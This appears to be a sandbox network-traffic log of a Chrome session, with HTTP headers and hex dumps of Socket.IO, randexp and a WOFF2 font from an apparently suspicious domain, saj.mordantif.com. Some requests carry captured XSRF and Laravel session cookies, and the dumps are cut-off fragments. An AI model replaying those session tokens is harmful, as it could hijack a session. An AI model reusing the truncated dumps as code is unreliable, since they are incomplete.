                                                        2024-09-13 13:07:06 UTC800INData Raw: 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e
                                                        Data Ascii: AACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.
                                                        2024-09-13 13:07:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.5497853.161.119.884433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:06 UTC359OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                        Host: cdn.socket.io
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:06 UTC701INHTTP/1.1 200 OK
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Content-Length: 45806
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31536000, immutable
                                                        Content-Disposition: inline; filename="socket.io.min.js"
                                                        Date: Sun, 08 Sep 2024 23:52:20 GMT
                                                        ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                        Server: Vercel
                                                        Strict-Transport-Security: max-age=63072000
                                                        X-Vercel-Cache: HIT
                                                        X-Vercel-Id: fra1::fvnlf-1725839540803-e51598633d00
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 7e6e89f6989c614914afa5697ad62aaa.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: VIE50-P2
                                                        X-Amz-Cf-Id: d8hpjgqLz3xQaIsO4Y4Iq2D-R6jvNhtCmICsYwfkyw0m7ojWZ12Vgg==
                                                        Age: 393286
                                                        2024-09-13 13:07:06 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                        Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                        2024-09-13 13:07:06 UTC16384INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                        Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                        2024-09-13 13:07:06 UTC13038INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                                                        Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.549786185.199.111.1334433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:06 UTC860OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240913%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240913T130616Z&X-Amz-Expires=300&X-Amz-Signature=012060cabb4d90d7bb147ccc7111563bd05e78b595e483f09ff2bc4e80b1baaf&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                                        Host: objects.githubusercontent.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:06 UTC846INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 10245
                                                        Content-Type: application/octet-stream
                                                        Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                                        ETag: "0x8D9B9A009499A1E"
                                                        Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                        x-ms-request-id: c04d24d1-701e-006d-40c9-dd551e000000
                                                        x-ms-version: 2020-10-02
                                                        x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                                        x-ms-blob-content-md5: bCCivoupALwKcRiJOisQcg==
                                                        x-ms-lease-status: unlocked
                                                        x-ms-lease-state: available
                                                        x-ms-blob-type: BlockBlob
                                                        Content-Disposition: attachment; filename=randexp.min.js
                                                        x-ms-server-encrypted: true
                                                        Via: 1.1 varnish, 1.1 varnish
                                                        Fastly-Restarts: 1
                                                        Accept-Ranges: bytes
                                                        Date: Fri, 13 Sep 2024 13:07:06 GMT
                                                        Age: 4200
                                                        X-Served-By: cache-iad-kiad7000071-IAD, cache-nyc-kteb1890080-NYC
                                                        X-Cache: HIT, HIT
                                                        X-Cache-Hits: 47, 1
                                                        X-Timer: S1726232827.665824,VS0,VE0
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                                        Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
                                                        Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                                        Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                                        Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
                                                        Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                                        Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                                        Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                                        2024-09-13 13:07:06 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                                        Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.549796172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:07 UTC1402OUTGET /90cIpGfk2aMerArq2KIwyO12gL058Oayz79 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://saj.mordantif.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:07 UTC638INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:07 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 43596
                                                        Connection: close
                                                        Content-Disposition: inline; filename="90cIpGfk2aMerArq2KIwyO12gL058Oayz79"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMZYoR7R695kUAvAE20jp2lCfp7rdj%2BPgOOyUgnFlSJwXWODY51m%2Fh9X3%2Bwxpa3gJE0JlFHKr%2BEm%2FTZHQIrINYFQoGycJfw0P%2FGpj7sLpCGKKsjXpyz%2FGegjkrqbXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bc28c5d0f59-EWR
                                                        2024-09-13 13:07:07 UTC731INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
                                                        Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
                                                        2024-09-13 13:07:07 UTC1369INData Raw: b7 3d 62 5e e9 ec bf 1e 69 44 96 e1 11 7d 20 8c 8e 20 be ec 62 a6 ec fc 7d 44 49 76 75 d1 71 04 88 0f d8 6b cb 96 34 d2 0c f7 cc 14 40 c0 10 ce d5 ff 50 2a b0 b0 6a dc ed 89 29 f7 ec 94 27 df 4c 97 eb 89 c9 c2 ae b3 dc b1 62 e0 85 52 51 6a 49 2a 49 9b b4 51 6b da 54 ae 6c fa 5f 77 4f 0f d0 92 24 cb 1f e8 08 21 63 cc 2e 25 cb 7b 80 95 5f 4e 90 02 45 40 fc 00 0d 92 41 b0 da 9d f9 3f 9c ee 9a d9 61 57 0b 79 99 67 66 9d 67 1b 26 45 bc 0c f7 20 7e 88 78 f0 62 c5 cc 83 05 b5 62 c1 82 85 7e f8 a7 d6 f4 ef 1e 66 2f 80 a8 0a 1e d0 47 8a 82 b3 9d 4a 1b 36 b2 79 fe b3 df fa 0e 7a 45 40 54 9c 61 aa 30 5e 55 6c f6 df cf 06 00 fc 53 3a c3 bf 92 2c 03 9e 7d 04 1b 42 ec 52 a7 a8 52 74 7e b7 76 d1 85 00 ba 4c 3a 60 34 c1 49 4b 41 1c e6 bd a7 56 a3 ca b1 b7 78 26 40 a1 1f
                                                        Data Ascii: =b^iD} b}DIvuqk4@P*j)'LbRQjI*IQkTl_wO$!c.%{_NE@A?aWygfg&E ~xbb~f/GJ6yzE@Ta0^UlS:,}BRRt~vL:`4IKAVx&@
